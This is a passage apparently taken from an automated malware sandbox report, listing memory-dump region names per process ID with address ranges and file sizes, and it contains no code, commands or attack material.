            • memory/1816-317-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/1816-318-0x000000000041A684-mapping.dmp
            • memory/1816-320-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

            • memory/1836-11-0x0000000000000000-mapping.dmp
            • memory/1836-234-0x0000000000320000-0x0000000000321000-memory.dmp
              Filesize

              4KB

            • memory/1836-230-0x0000000071500000-0x0000000071BEE000-memory.dmp
              Filesize

              6.9MB

            • memory/1836-225-0x0000000000000000-mapping.dmp
            • memory/1836-274-0x00000000042B0000-0x0000000004301000-memory.dmp
              Filesize

              324KB

            • memory/1836-236-0x00000000003A0000-0x00000000003A1000-memory.dmp
              Filesize

              4KB

            • memory/1868-37-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1868-31-0x0000000000000000-mapping.dmp
            • memory/1876-8-0x0000000000000000-mapping.dmp
            • memory/1880-10-0x0000000000000000-mapping.dmp
            • memory/1912-290-0x0000000070F80000-0x000000007166E000-memory.dmp
              Filesize

              6.9MB

            • memory/1912-314-0x0000000000620000-0x0000000000644000-memory.dmp
              Filesize

              144KB

            • memory/1912-287-0x0000000000000000-mapping.dmp
            • memory/1912-296-0x0000000000610000-0x0000000000611000-memory.dmp
              Filesize

              4KB

            • memory/1912-293-0x00000000011C0000-0x00000000011C1000-memory.dmp
              Filesize

              4KB

            • memory/1976-15-0x0000000000000000-mapping.dmp
            • memory/2020-380-0x0000000073820000-0x0000000073F0E000-memory.dmp
              Filesize

              6.9MB

            • memory/2020-381-0x0000000000E50000-0x0000000000E51000-memory.dmp
              Filesize

              4KB

            • memory/2020-376-0x0000000000000000-mapping.dmp
            • memory/2020-384-0x0000000004B10000-0x0000000004B11000-memory.dmp
              Filesize

              4KB

            • memory/2020-383-0x0000000002750000-0x0000000002751000-memory.dmp
              Filesize

              4KB

            • memory/2020-382-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
              Filesize

              4KB

            • memory/2084-260-0x0000000000417A8B-mapping.dmp
            • memory/2084-269-0x0000000000417A8B-mapping.dmp
            • memory/2084-266-0x0000000000417A8B-mapping.dmp
            • memory/2084-194-0x0000000000417A8B-mapping.dmp
            • memory/2084-267-0x0000000000417A8B-mapping.dmp
            • memory/2084-268-0x0000000000417A8B-mapping.dmp
            • memory/2084-259-0x0000000000417A8B-mapping.dmp
            • memory/2084-261-0x0000000000417A8B-mapping.dmp
            • memory/2084-270-0x0000000000417A8B-mapping.dmp
            • memory/2084-271-0x0000000000417A8B-mapping.dmp
            • memory/2084-265-0x0000000000417A8B-mapping.dmp
            • memory/2084-264-0x0000000000417A8B-mapping.dmp
            • memory/2084-262-0x0000000000417A8B-mapping.dmp
            • memory/2084-263-0x0000000000417A8B-mapping.dmp
            • memory/2172-341-0x0000000000000000-mapping.dmp
            • memory/2172-345-0x0000000073820000-0x0000000073F0E000-memory.dmp
              Filesize

              6.9MB

            • memory/2172-361-0x0000000000BC0000-0x0000000000BC3000-memory.dmp
              Filesize

              12KB

            • memory/2172-352-0x00000000005B0000-0x00000000005C1000-memory.dmp
              Filesize

              68KB

            • memory/2172-350-0x00000000003A0000-0x00000000003A1000-memory.dmp
              Filesize

              4KB

            • memory/2172-347-0x0000000001360000-0x0000000001361000-memory.dmp
              Filesize

              4KB

            • memory/2268-202-0x000000000041A684-mapping.dmp
            • memory/2432-415-0x0000000000000000-mapping.dmp
            • memory/2432-449-0x0000000000000000-mapping.dmp
            • memory/2432-437-0x0000000000000000-mapping.dmp
            • memory/2432-435-0x0000000000000000-mapping.dmp
            • memory/2432-453-0x0000000000000000-mapping.dmp
            • memory/2432-451-0x0000000000000000-mapping.dmp
            • memory/2432-443-0x0000000000000000-mapping.dmp
            • memory/2432-433-0x0000000000000000-mapping.dmp
            • memory/2432-447-0x0000000000000000-mapping.dmp
            • memory/2432-431-0x0000000000000000-mapping.dmp
            • memory/2432-439-0x0000000000000000-mapping.dmp
            • memory/2432-429-0x0000000000000000-mapping.dmp
            • memory/2432-427-0x0000000000000000-mapping.dmp
            • memory/2432-425-0x0000000000000000-mapping.dmp
            • memory/2432-423-0x0000000000000000-mapping.dmp
            • memory/2432-455-0x0000000000000000-mapping.dmp
            • memory/2432-421-0x0000000000000000-mapping.dmp
            • memory/2432-441-0x0000000000000000-mapping.dmp
            • memory/2432-411-0x0000000000000000-mapping.dmp
            • memory/2432-403-0x0000000000000000-mapping.dmp
            • memory/2432-419-0x0000000000000000-mapping.dmp
            • memory/2432-417-0x0000000000000000-mapping.dmp
            • memory/2432-445-0x0000000000000000-mapping.dmp
            • memory/2432-413-0x0000000000000000-mapping.dmp
            • memory/2432-457-0x0000000000000000-mapping.dmp
            • memory/2432-407-0x0000000000000000-mapping.dmp
            • memory/2432-401-0x0000000000000000-mapping.dmp
            • memory/2432-461-0x0000000000000000-mapping.dmp
            • memory/2432-463-0x0000000000000000-mapping.dmp
            • memory/2432-409-0x0000000000000000-mapping.dmp
            • memory/2432-465-0x0000000000000000-mapping.dmp
            • memory/2432-405-0x0000000000000000-mapping.dmp
            • memory/2432-459-0x0000000000000000-mapping.dmp
            • memory/2432-399-0x0000000000000000-mapping.dmp
            • memory/2432-467-0x0000000000000000-mapping.dmp
            • memory/2432-469-0x0000000000000000-mapping.dmp
            • memory/2432-471-0x0000000000000000-mapping.dmp
            • memory/2432-397-0x0000000000000000-mapping.dmp
            • memory/2432-395-0x0000000000000000-mapping.dmp
            • memory/2432-385-0x0000000000110000-0x0000000000111000-memory.dmp
              Filesize

              4KB

            • memory/2432-386-0x0000000000000000-mapping.dmp
            • memory/2432-387-0x0000000000150000-0x0000000000151000-memory.dmp
              Filesize

              4KB

            • memory/2432-393-0x0000000000000000-mapping.dmp
            • memory/2432-389-0x0000000000000000-mapping.dmp
            • memory/2432-391-0x0000000000000000-mapping.dmp
            • memory/2468-312-0x0000000000000000-mapping.dmp
            • memory/2544-110-0x00000000013D0000-0x00000000013D1000-memory.dmp
              Filesize

              4KB

            • memory/2544-108-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/2544-105-0x0000000000000000-mapping.dmp
            • memory/2544-199-0x0000000000D00000-0x0000000000DB0000-memory.dmp
              Filesize

              704KB

            • memory/2544-212-0x0000000000CB0000-0x0000000000CBD000-memory.dmp
              Filesize

              52KB

            • memory/2592-213-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2592-214-0x000000000043FCC3-mapping.dmp
            • memory/2592-216-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

            • memory/2596-114-0x0000000000000000-mapping.dmp
            • memory/2616-313-0x0000000000000000-mapping.dmp
            • memory/2628-119-0x0000000000000000-mapping.dmp
            • memory/2636-358-0x0000000000000000-mapping.dmp
            • memory/2652-171-0x000007FEF84F0000-0x000007FEF876A000-memory.dmp
              Filesize

              2.5MB

            • memory/2720-127-0x0000000000000000-mapping.dmp
            • memory/2740-322-0x0000000000000000-mapping.dmp
            • memory/2740-325-0x0000000073820000-0x0000000073F0E000-memory.dmp
              Filesize

              6.9MB

            • memory/2740-375-0x0000000001EA0000-0x0000000001EC4000-memory.dmp
              Filesize

              144KB

            • memory/2740-330-0x00000000000F0000-0x00000000000F1000-memory.dmp
              Filesize

              4KB

            • memory/2740-332-0x0000000000560000-0x0000000000561000-memory.dmp
              Filesize

              4KB

            • memory/2740-377-0x0000000001F90000-0x0000000001FB5000-memory.dmp
              Filesize

              148KB

            • memory/2776-136-0x0000000000000000-mapping.dmp
            • memory/2812-142-0x0000000000000000-mapping.dmp
            • memory/2836-146-0x0000000000000000-mapping.dmp
            • memory/2856-349-0x0000000000000000-mapping.dmp
            • memory/2872-155-0x0000000000417A8B-mapping.dmp
            • memory/2872-152-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/2872-159-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

            • memory/2900-251-0x0000000000000000-mapping.dmp
            • memory/2920-164-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2920-161-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

            • memory/2920-162-0x000000000043FCC3-mapping.dmp
            • memory/2944-254-0x0000000002140000-0x0000000002151000-memory.dmp
              Filesize

              68KB

            • memory/2944-253-0x0000000000000000-mapping.dmp
            • memory/2944-272-0x0000000002710000-0x0000000002721000-memory.dmp
              Filesize

              68KB

            • memory/2952-168-0x000000000043FCC3-mapping.dmp
            • memory/3064-177-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/3064-178-0x000000000041A684-mapping.dmp
            • memory/3064-181-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

            • memory/3068-344-0x0000000000000000-mapping.dmp